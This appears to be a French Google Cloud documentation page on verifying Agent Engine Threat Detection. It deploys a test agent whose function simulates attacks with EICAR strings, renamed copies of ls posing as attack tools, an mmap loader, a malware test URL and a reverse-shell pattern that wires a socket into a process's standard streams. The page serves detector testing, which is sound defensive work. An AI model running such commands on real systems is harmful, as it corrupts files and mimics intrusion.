Cette page explique comment vérifier que Agent Engine Threat Detection fonctionne en déclenchant intentionnellement des détecteurs et en vérifiant les résultats. Agent Engine Threat Detection est un service intégré de Security Command Center.
Avant de commencer
Pour détecter les menaces potentielles pour vos agents Vertex AI Agent Engine, assurez-vous que le service de détection des menaces Agent Engine est activé dans Security Command Center.
Configurer l'environnement
Pour tester Agent Engine Threat Detection, configurez un agent de démonstration qui simule une activité malveillante.
Créer un projet et activer le shell
Sélectionnez ou créez un projet Google Cloud à utiliser pour le test.
Pour tester les détecteurs, vous pouvez utiliser la console Google Cloud et Cloud Shell.
Accédez à la consoleGoogle Cloud .
Sélectionnez le projet que vous utiliserez pour le test.
Cliquez sur Activer Cloud Shell.
Vous pouvez également exécuter les instructions de test à partir d'un shell local.
Configurer Vertex AI Agent Engine
Si vous n'avez jamais utilisé Vertex AI Agent Engine dans ce projet, configurez l'environnement Vertex AI Agent Engine avant de commencer. Notez le nom du bucket de préproduction Cloud Storage que vous avez créé. Nous vous recommandons également de suivre le démarrage rapide de Vertex AI Agent Engine pour apprendre à développer et à déployer un agent avec le SDK Vertex AI.
Créer un script de test
Vous allez créer plusieurs fichiers qui seront utilisés pour déployer un nouvel agent à des fins de test. Pour cela, utilisez un éditeur de texte tel que nano.
Créez un fichier nommé
requirements.txtavec le contenu suivant.google-cloud-aiplatform[agent_engines] google-adk google-genai aiohttp cloudpickle pydanticCréez un fichier vide nommé
installation_scripts/install.sh. Certains tests nécessitent d'ajouter du contenu à ce fichier.Créez un fichier nommé
main.pyavec le contenu suivant. Remplacez les variablesPROJECT_ID,LOCATIONetSTAGING_BUCKET. Le nom du bucket intermédiaire doit inclure le préfixegs://.import asyncio import os import subprocess import socket import vertexai from vertexai import Client, agent_engines from google.adk.agents import llm_agent from google.adk.sessions.in_memory_session_service import InMemorySessionService # Replace with your own project, location, and staging bucket. LOCATION = "LOCATION" PROJECT_ID = "PROJECT_ID" # Staging bucket must have gs:// prefix STAGING_BUCKET = "STAGING_BUCKET" client = Client(project=PROJECT_ID, location=LOCATION) def _run_command(args, **kwargs): output = f"Called {' '.join(args)}\n" try: res = subprocess.run(args, capture_output=True, text=True, **kwargs) if res.stdout: output += f"Result: {res.stdout.strip()}\n" if res.stderr: output += f"Error: {res.stderr.strip()}\n" except subprocess.TimeoutExpired: output += "Command timed out as expected." return output # Tool to simulate threats. The function body will be replaced for individual # detector tests. def threat_detection_test(): output = _run_command(["sleep", "60"]) output += _run_command(["echo", "this is a fake threat"]) output += _run_command(["sleep", "10"]) return output root_agent = llm_agent.Agent( model="gemini-2.5-flash", name="threat_detection_test_agent", description="Runs threat detection test.", instruction=""" You are an agent that runs a threat detection test using a fake malicious command. """, tools=[threat_detection_test], ) async def main(): vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) app = agent_engines.AdkApp( agent=root_agent, session_service_builder=InMemorySessionService ) remote_agent = client.agent_engines.create( agent=app, config={ "display_name": "scc_threat_test_agent", "identity_type": vertexai.types.IdentityType.AGENT_IDENTITY, "requirements": [ "google-cloud-aiplatform[agent_engines,adk]", "cloudpickle", "pydantic", ], "staging_bucket": STAGING_BUCKET, "extra_packages": [ "installation_scripts/install.sh", ], }, ) print("Deployed agent: ", remote_agent.api_resource.name) try: async for event in remote_agent.async_stream_query( user_id="threat_detection_tester", message="Run the threat detection test", ): print(event) finally: client.agent_engines.delete(name=remote_agent.api_resource.name, force=True) if __name__ == "__main__": asyncio.run(main())
Configurer l'environnement virtuel
Créez et activez un environnement virtuel Python.
python3 -m venv env source env/bin/activateInstallez les dépendances nécessaires dans l'environnement virtuel.
pip install -r requirements.txt
Tester le script
Exécutez le script depuis l'environnement virtuel avec python3 main.py.
L'exécution de cette commande prendra plusieurs minutes pour compiler, déployer et exécuter l'agent de test.
Le script génère le nom de ressource de l'agent déployé, ainsi que quelques objets JSON, y compris une réponse LLM et d'autres métadonnées. Si vous rencontrez des erreurs d'autorisation ou de déploiement à cette étape, consultez la section Dépannage pour connaître la marche à suivre.
Tester les détecteurs
Pour tester les détecteurs Agent Engine Threat Detection, remplacez le code de la fonction threat_detection_test par un code qui simule une attaque. Le script peut prendre beaucoup de temps pour déployer l'agent et l'interroger. Pour accélérer les tests, vous pouvez combiner le contenu de plusieurs de ces fonctions.
Exécution : binaire malveillant ajouté exécuté
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output += _run_command(["touch", "/tmp/test_mal_file"])
with open("/tmp/test_mal_file", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/tmp/test_mal_file"])
output += _run_command(["sh", "-c", "/tmp/test_mal_file"])
output += _run_command(["sleep", "10"])
return output
Exécution : bibliothèque malveillante ajoutée chargée
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le. Vous pouvez recevoir une erreur du SDK Vertex AI concernant l'analyse de la réponse, mais le résultat est quand même généré.
def threat_detection_test():
output = _run_command(["sleep", "60"])
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
with open("/tmp/test_mal_lib", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/tmp/test_mal_lib"])
output += _run_command(["sleep", "10"])
return output
Exécution : échappement de conteneur
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/botb-linux-amd64"])
output += _run_command(["chmod", "700", "/tmp/botb-linux-amd64"])
output += _run_command(["/tmp/botb-linux-amd64", "-autopwn"])
output += _run_command(["sleep", "10"])
return output
Exécution : exécution d'un outil d'attaque de Kubernetes
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/amicontained"])
output += _run_command(["/tmp/amicontained"])
output += _run_command(["sleep", "10"])
return output
Exécution : exécution d'un outil de reconnaissance local
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/ls", "/tmp/linenum.sh"])
output += _run_command(["/tmp/linenum.sh"])
output += _run_command(["sleep", "10"])
return output
Exécution : binaire malveillant modifié exécuté
Replace the `threat_detection_test` function in the test script, and then run the
test script.
```python
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
output += _run_command(["chmod", "700", "/code/entrypoint.sh"]) output += _run_command(["sh", "-c", "/code/entrypoint.sh"]) output += _run_command(["sleep", "10"]) return output ```
Exécution : bibliothèque malveillante modifiée chargée
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.
def threat_detection_test():
eicar = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
output = _run_command(["sleep", "60"])
output += _run_command(["chmod", "-R", "777", "/code"])
with open("/code/entrypoint.sh", "w") as f:
f.write(eicar)
with open("/tmp/loader.c", "w") as f:
f.write("""
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char *argv[]) {
int fd = open(argv[1], O_RDONLY);
struct stat sb;
fstat(fd, &sb);
void* addr = mmap(NULL, sb.st_size, PROT_EXEC, MAP_PRIVATE, fd, 0);
write(1, addr, sb.st_size);
munmap(addr, sb.st_size);
close(fd);
return 0;
}
""")
output += _run_command(["gcc", "/tmp/loader.c", "-o", "/tmp/loader"])
output += _run_command(["/tmp/loader", "/code/entrypoint.sh"])
output += _run_command(["sleep", "10"])
return output
URL malveillante observée
Mettez à jour le fichier installation_scripts/install.sh avec le contenu suivant.
#!/bin/bash
apt-get install -y curl --no-install-recommends
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.
def threat_detection_test():
url = "https://testsafebrowsing.appspot.com/s/malware.html"
output = _run_command(["sleep", "60"])
output += _run_command(["curl", url])
output += _run_command(["sleep", "10"])
return output
Interface système inversée
Remplacez la fonction threat_detection_test dans le script de test, puis exécutez-le.
def threat_detection_test():
output = _run_command(["sleep", "60"])
output += _run_command(["cp", "/bin/echo", "/tmp/sh"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("8.8.8.8", 53))
subprocess.run(["/tmp/sh"], stdin=s, stdout=s, stderr=s, timeout=5)
output += _run_command(["sleep", "10"])
return output
Étapes suivantes
- En savoir plus sur Agent Engine Threat Detection
- Découvrez comment utiliser Agent Engine Threat Detection.